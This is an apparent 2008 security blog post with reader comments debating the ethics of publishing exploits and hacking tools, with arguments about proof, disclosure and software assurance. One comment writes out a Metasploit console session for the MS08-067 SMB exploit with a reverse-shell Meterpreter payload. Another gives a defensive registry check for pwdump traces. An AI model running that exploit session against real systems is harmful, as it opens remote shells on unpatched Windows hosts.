Tuesday, October 28, 2008

Thoughts on why we need exploit code and hacker tools

Dean made a comment in the SILC channel about a student:

"student thinks its terrible to release tools, exploits, etc...he says it makes it too easy for people to attack America"

It's not the first time I've heard that argument, but after a few weeks in the new gig I have a newfound understanding of the need to provide "absolute proof" of exploitation, or of the ability to exploit something.

So while on the one hand I understand that exploit code and tools allow bad guys to do what they do, on the other hand you have people who require you, as their security person, to show them with absolute certainty that something happened or could happen. Otherwise there is no "proof." And if I need to show proof to get a problem fixed or mitigated, or a policy changed or put in place, it's nice to have the ability to do that.

Thoughts?

9 comments:

  1. Hi Chris, I've been following your blog for a while and thought I'd comment on this one - it raises some huge issues that have been debated over and over again:

    Unfortunately this is a human problem. Comparing it to physical security: if I buy a very expensive lock for my house, I'll believe it is secure, and I'd probably have been told as much by the locksmith I bought it from. If someone then tells me that it can be easily bypassed or opened, I will require proof of that fact before I believe it. I'll require it all the more because someone I respect has already told me it is secure.

    An object lesson is hard to beat, and a demonstration of slipping the lock or using a bump key on it provides the required proof as plain as day. In a way, we can compare intrusion tools and exploits to lock picks and lock bypass equipment. Do we make them illegal? No; even if there were laws restricting these tools to licensed owners (locksmiths/security professionals), it would be trivial for anyone to build their own. It is infinitely more important to secure things effectively than to restrict the tools used to defeat that security.

    Having said that however, security (whether physical or electronic) is almost always going to be a compromise between cost and probability of intrusion. Do I buy that very expensive lock for my house and accept the fact that the intruder can just break a window? Do I put bars on my windows and accept the fact that the door can effectively be kicked in? Do I revamp the door with a metal frame, only to find that the lock can be bypassed in some obscure manner anyway? ... do I hire that professional pen-tester to secure our network as best he can or do I trust our sysadmin to do his best? Do I secure my house like I do a bank vault? Do I secure my computer network like a government facility? In any case, how do I protect against an ignorant employee clicking on a flashy popup from his work computer?

    Sure, not providing ready-made tools and exploits may make it more difficult for the mal-intentioned to break into things, but only in a fictional utopian society would "difficult" mean the same thing as "secure".

  2. Great points, Nick, especially the one about 'how much security is enough'. Cost vs. security, risk vs. productivity seems to be an ongoing mantra.

    The ability to demonstrate a weakness or vulnerability in existing security controls has a definite impact on the asset owner. My previous post on the web app pentest had just that effect on the client.

    My comment about the student and their opinion came about from a discussion on the ethics or social responsibility of releasing tools, scripts, frameworks and exploit code that either publicizes a vulnerability or makes it easier for an attacker to gain access to their target system.

    Both sides of the argument carry weight. I lean towards the side of responsible disclosure and believe that disclosure requires vendors not only to fix existing vulns but also to take security into account going forward. It also spurs research and development in all areas of security.

    The argument that I think is based on a 'knee-jerk' reaction is the 'it makes it easier for attackers to target us' one. Placing limitations on researchers and security professionals because of the possible threat posed by the tools can be likened to the gun control argument. Germany's and the UK's laws on this are draconian at best and really don't stop the development or use of these tools; they only push them underground.

    The argument that these exploits and tools also help criminals carries weight too, but the reality is that the level of communication and research I see amongst malware authors and the organizations behind them far, far exceeds anything we are capable of. Right now the people focused on defending against these threats are playing catch-up. I can only imagine the gap if they were regulated and had their resources limited.

    This will always be an ongoing argument/discussion, but it's good to revisit it and hear fresh perspectives.

  3. Just to clarify, I am in the "we should have tools and code" camp.

    On the physical security example Nick gave, I think you are right. Adding all that additional stuff to your house increases the level of sophistication required of the attacker, or your ability to detect them (you didn't specifically mention an alarm system, but I don't think it's a stretch).

    Network security is the same way: we harden, ACL, firewall and monitor. Things still get in and users still click on things, but the idea is that with the monitoring we catch the user stuff, and we have (hopefully) raised the level of sophistication an attacker needs to bypass the other measures.

    Anyway, what spurred all of this was forensics finding evidence of pwdump on a box by finding its registry key, and someone above us asking for proof that pwdump was run, despite the fact that there was a registry key entry :-( A check like the sketch below is exactly the sort of thing that settles that argument.
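
    Here is a minimal sketch in Python of what that kind of artifact check looks like, using the stdlib winreg module on the box being examined. The service key names are hypothetical placeholders -- the actual key left behind varies by pwdump variant, so treat this as an illustration, not a signature list:

        # Minimal sketch: look for registry artifacts left behind by
        # pwdump-style tools. Key paths are hypothetical placeholders;
        # real artifact names vary by tool and version.
        import winreg

        CANDIDATE_KEYS = [
            r"SYSTEM\CurrentControlSet\Services\PWDUMP",         # placeholder
            r"SYSTEM\CurrentControlSet\Services\PwDumpService",  # placeholder
        ]

        def key_exists(hive, path):
            """Return True if the key opens read-only, False if it is absent."""
            try:
                winreg.CloseKey(winreg.OpenKey(hive, path, 0, winreg.KEY_READ))
                return True
            except OSError:
                return False

        for path in CANDIDATE_KEYS:
            if key_exists(winreg.HKEY_LOCAL_MACHINE, path):
                print("artifact found: HKLM\\" + path)

    It doesn't prove the tool was run all by itself, but it turns "trust me, the key is there" into something anyone above us can re-run and see.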

  4. CG - I've had the exact same thing happen. A system is missing patches and is known to be vulnerable, but if there isn't a working exploit in metasploit/core/canvas or elsewhere, and I don't have the time or skill to reverse engineer the vuln and write an exploit myself, then the system owner considers it a low-priority event and the system remains unpatched. Yet when I could demonstrate the issue, things got fixed much faster. You'd like to think that people are smarter, but they are not; they are trying to balance risk vs. productivity along with resource allocation and use. The attackers, though, don't care about risk and productivity matrices, and are happy to take advantage of an organization following the wrong practices. As assessors and pentesters, we need tools and exploits to do our work more effectively, despite the other pain that public exploits may cause.

    -cw

  5. The public release of code does change the risk. A tool such as metasploit incentivizes clients to patch, due to its ease of use. For example, MS08-067 on SP3 isn't trivial to exploit for the average sysadmin, until you introduce metasploit (see the session sketched below). As a pen-tester, public code helps to illustrate risk, but often that risk is a consequence of said code. You need to look at the threat actors facing an organisation; tools such as metasploit widen that pool of actors significantly.
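
    To illustrate the ease-of-use point, the whole attack reduces to a handful of console commands, roughly like the session below. The module name is the one publicly released for MS08-067; the addresses are hypothetical, and option names may vary slightly between framework versions:

        msf > use exploit/windows/smb/ms08_067_netapi
        msf exploit(ms08_067_netapi) > set RHOST 10.0.0.5
        msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
        msf exploit(ms08_067_netapi) > set LHOST 10.0.0.2
        msf exploit(ms08_067_netapi) > exploit

    Five commands, and no understanding of the underlying overflow required. That is exactly what widens the pool.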

    Catch 22…

  6. Guns, knives and ropes can all be used to kill.

    If you give someone a tool, it's always their decision on how they use it.

  7. There will always be value in proving you can get in and proving that something is broken.
    I don't think restricting them would do any good, nor would banning them. There is a good discussion on a recent episode of the Risky Business podcast with Marcus Ranum of Tenable Network Security, who makes some good points. I think using a tool with no idea of what it is doing or how it is exploiting the vulnerability makes you no more than a script kiddie, like a chef who doesn't know what goes well together and just follows a recipe.
    But there is also value in pointing out flaws in the design, not just in some obscure server or software bug.

  8. there is a major difference between metasploit and lock bypass equipment. one is a virtual, unlimited resource and the other is a physical, finite resource.

    security has nothing directly to do with writing exploits or using exploitation frameworks. indirectly, this sort of "evil" software can be used for verification that a vulnerability gives threats access to assets ("good" software).

    somebody, at some point, needs to independently evaluate "good" software with "evil" software. they can't prove anything though, and their work is never done. there never is any "proof" of anything -- that's a fallacy. your eyes will always deceive you because they can always be deceived.

    metasploit was great at inception, but some of this has gone too far. the point of raising awareness of software weaknesses was enough for me when i read aleph1's paper on smashing the stack in 1996. it takes a long time for others to be convinced for some reason. these people shouldn't be decision-makers for security at large, profitable companies or important government organizations.

    at some point, our industry will abandon CISSP and move to a new "path" for risk expertise that resembles the paths of an accountant, lawyer, or doctor. our industry is just as important as those industries (finance, law, and medicine) because of the dangers and risks involved to humanity at the individual, sociological, and economic levels. accountants don't recommend that clients put cash under mattresses, judges no longer cut off hands or fingers, and doctors no longer employ leeches. standards and practices change over time as we learn better ways of doing things. maybe a doctor will amputate a limb, but only as a last-ditch effort, never as a first resort.

    i believe that we are already well on our way to a more formal set of standards and practices that are well accepted by the world. i think that a majority of the boards of directors for companies have heard of application security today thanks to gartner and the burton group, as well as booz allen hamilton, cigital, and even sans (but also many others). if you look at what is happening in our military and government, there have been some significant changes lately.

    i was fortunate to have worked at ebay, where i brought in @stake in 2001 to do risk analysis and code review. at that time, responsible disclosure and exploitation tools were just hitting the scene, and our industry needed everything it could get its hands on.

    today, these aspects still ring true, but the criminal element has changed significantly. criminals no longer target only banks and e-commerce; everyone is now a target. worms and titan rain came on the scene between 2001 and 2003, which also changed our industry a lot. today, i question whether it's better to spend my time and energy on network pentesting, writing exploits, or even finding vulnerabilities and reporting them via responsible disclosure -- rather than spending it on fixing the root causes of our problems. i'm talking about software assurance.

    if you are considering a path in exploitation, i highly suggest learning about the history before jumping into things. even "experts" like dan kaminsky still don't get it... even he has a lot to learn.

    most of the problems in our industry exist because the "old-timers" at large companies and important organizations have not accepted the fact that applications present inherent risks in the form of software weaknesses. proving anything to these people is a waste of time, much like coding an 80-year-old dying patient with a 40-year history of heart problems is not going to accomplish much, at least not for long.

    don't cater to these people; trying to prove things to them is wasting your time. instead, start a software assurance program or teach a young developer how to code securely.

    i do not think that metasploit is an "evil" project. it's a great learning tool, to be used in a lab or training environment. we need more security professionals who know metasploit and how to create exploits (it's part of the independent evaluation process we need for application security verification). but we don't need them "proving" anything.

    thanks.

  9. Andre,
    insightful comments as usual. thanks!
